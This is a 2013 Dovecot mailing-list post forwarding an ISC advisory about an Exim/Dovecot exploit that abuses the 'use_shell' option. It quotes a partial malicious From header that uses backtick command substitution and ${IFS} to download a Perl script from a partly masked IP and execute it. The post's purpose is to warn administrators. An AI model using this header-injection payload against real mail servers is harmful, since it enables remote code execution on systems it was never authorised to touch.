[Dovecot] from ISC: Exim/Dovecot exploit making the rounds
Luigi Rosa
lists at luigirosa.com
Sun Jun 9 10:58:12 EEST 2013
One of our readers wrote in to let us know that he had received an attempted
Exim/Dovecot exploit attempt against his email server. The exploit partially
looked like this:
From:
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against
itself. This feature, unfortunately, is found in the example wiki on Dovecot's
website, and also in their example configuration. We'd caution anyone that is
using Dovecot to take a look at their configuration and make use they aren't
using the "use_shell" parameter. Or if you are, make darn sure you know what
you are doing, and how to defend yourself.
https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
Ciao,
luigi
--
/
+--[Luigi Rosa]--
\
The generation of random numbers is too important to be left to chance.
More information about the dovecot
mailing list